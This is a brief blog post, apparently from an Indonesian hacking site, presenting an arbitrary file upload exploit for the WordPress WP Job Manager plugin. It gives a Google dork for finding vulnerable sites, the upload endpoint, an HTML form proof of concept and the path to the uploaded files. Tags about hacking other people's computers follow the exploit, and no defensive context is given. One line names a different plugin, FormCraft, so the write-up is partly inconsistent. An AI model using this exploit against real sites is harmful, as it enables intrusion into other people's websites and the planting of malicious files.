Google Dork : inurl:/wp-content/plugins/wp-job-manager/
Exploit : https://localhost/jm-ajax/upload_file/
Vulnerability : FormCraft {"files":[]}
PoC :
<form method="POST" action="https://localhost/jm-ajax/upload_file/" enctype="multipart/form-data">
<input type="file" name="files[]" />
<button>Upload!</button><br/>
</form>
File Access : https://localhost/wp-content/uploads/job-manager-uploads/files/tahun/bulan/your-files.jpg
Great : Indonesian Freedom Security - Base POM303
Tags : Cara untuk Meretas sebuah Komputer,trick Hack Komputer Super Jail,Cara Mematikan Komputer Orang Lain,Cara Mengendalikan Komputer Jarak Jauh,Cara Meretas Komputer Orang Lain,Cara Hack Komputer Orang Lain,Cara Meretas Komputer Orang dari Jarak Jauh,Cara memantau Komputer lain dengan Command Prompt,Cara hack komputer remote menggunakan IP,Trik Hack Komputer yang Sangat Berbahaya,Dasar-dasar Meretas,Dasar-dasar Hack,
0 Response to "WordPress Plugins WP Job Manager - Arbitrary File Upload"
Post a Comment